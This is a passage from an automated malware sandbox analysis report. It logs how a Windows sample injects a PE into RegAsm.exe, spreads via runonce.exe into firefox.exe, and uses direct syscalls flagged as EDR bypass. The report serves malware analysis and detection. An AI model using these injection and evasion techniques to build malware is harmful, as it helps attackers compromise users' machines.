                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]5_2_02D00BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]5_2_02D00BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]5_2_02D00BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]5_2_02D08BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]5_2_02D08BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]5_2_02D08BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8CBF0 mov eax, dword ptr fs:[00000030h]5_2_02D8CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2EBFC mov eax, dword ptr fs:[00000030h]5_2_02D2EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB4BB0 mov eax, dword ptr fs:[00000030h]5_2_02DB4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB4BB0 mov eax, dword ptr fs:[00000030h]5_2_02DB4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10BBE mov eax, dword ptr fs:[00000030h]5_2_02D10BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10BBE mov eax, dword ptr fs:[00000030h]5_2_02D10BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAEB50 mov eax, dword ptr fs:[00000030h]5_2_02DAEB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]5_2_02DD2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]5_2_02DD2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]5_2_02DD2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]5_2_02DD2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB4B4B mov eax, dword ptr fs:[00000030h]5_2_02DB4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB4B4B mov eax, dword ptr fs:[00000030h]5_2_02DB4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA8B42 mov eax, dword ptr fs:[00000030h]5_2_02DA8B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96B40 mov eax, dword ptr fs:[00000030h]5_2_02D96B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96B40 mov eax, dword ptr fs:[00000030h]5_2_02D96B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCAB40 mov eax, dword ptr fs:[00000030h]5_2_02DCAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF8B50 mov eax, dword ptr fs:[00000030h]5_2_02CF8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFCB7E mov eax, dword ptr fs:[00000030h]5_2_02CFCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]5_2_02D7EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4B00 mov eax, dword ptr fs:[00000030h]5_2_02DD4B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2EB20 mov eax, dword ptr fs:[00000030h]5_2_02D2EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2EB20 mov eax, dword ptr fs:[00000030h]5_2_02D2EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC8B28 mov eax, dword ptr fs:[00000030h]5_2_02DC8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC8B28 mov eax, dword ptr fs:[00000030h]5_2_02DC8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E8C0 mov eax, dword ptr fs:[00000030h]5_2_02D2E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD08C0 mov eax, dword ptr fs:[00000030h]5_2_02DD08C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C8F9 mov eax, dword ptr fs:[00000030h]5_2_02D3C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C8F9 mov eax, dword ptr fs:[00000030h]5_2_02D3C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCA8E4 mov eax, dword ptr fs:[00000030h]5_2_02DCA8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8C89D mov eax, dword ptr fs:[00000030h]5_2_02D8C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00887 mov eax, dword ptr fs:[00000030h]5_2_02D00887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30854 mov eax, dword ptr fs:[00000030h]5_2_02D30854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04859 mov eax, dword ptr fs:[00000030h]5_2_02D04859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04859 mov eax, dword ptr fs:[00000030h]5_2_02D04859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D12840 mov ecx, dword ptr fs:[00000030h]5_2_02D12840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96870 mov eax, dword ptr fs:[00000030h]5_2_02D96870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96870 mov eax, dword ptr fs:[00000030h]5_2_02D96870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E872 mov eax, dword ptr fs:[00000030h]5_2_02D8E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E872 mov eax, dword ptr fs:[00000030h]5_2_02D8E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8C810 mov eax, dword ptr fs:[00000030h]5_2_02D8C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA483A mov eax, dword ptr fs:[00000030h]5_2_02DA483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA483A mov eax, dword ptr fs:[00000030h]5_2_02DA483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A830 mov eax, dword ptr fs:[00000030h]5_2_02D3A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov ecx, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]5_2_02D22835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]5_2_02D0A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D349D0 mov eax, dword ptr fs:[00000030h]5_2_02D349D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCA9D3 mov eax, dword ptr fs:[00000030h]5_2_02DCA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D969C0 mov eax, dword ptr fs:[00000030h]5_2_02D969C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D329F9 mov eax, dword ptr fs:[00000030h]5_2_02D329F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D329F9 mov eax, dword ptr fs:[00000030h]5_2_02D329F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E9E0 mov eax, dword ptr fs:[00000030h]5_2_02D8E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D889B3 mov esi, dword ptr fs:[00000030h]5_2_02D889B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D889B3 mov eax, dword ptr fs:[00000030h]5_2_02D889B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D889B3 mov eax, dword ptr fs:[00000030h]5_2_02D889B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D009AD mov eax, dword ptr fs:[00000030h]5_2_02D009AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D009AD mov eax, dword ptr fs:[00000030h]5_2_02D009AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4940 mov eax, dword ptr fs:[00000030h]5_2_02DD4940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D80946 mov eax, dword ptr fs:[00000030h]5_2_02D80946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4978 mov eax, dword ptr fs:[00000030h]5_2_02DA4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4978 mov eax, dword ptr fs:[00000030h]5_2_02DA4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8C97C mov eax, dword ptr fs:[00000030h]5_2_02D8C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D26962 mov eax, dword ptr fs:[00000030h]5_2_02D26962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D26962 mov eax, dword ptr fs:[00000030h]5_2_02D26962
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 5464Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D63008Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
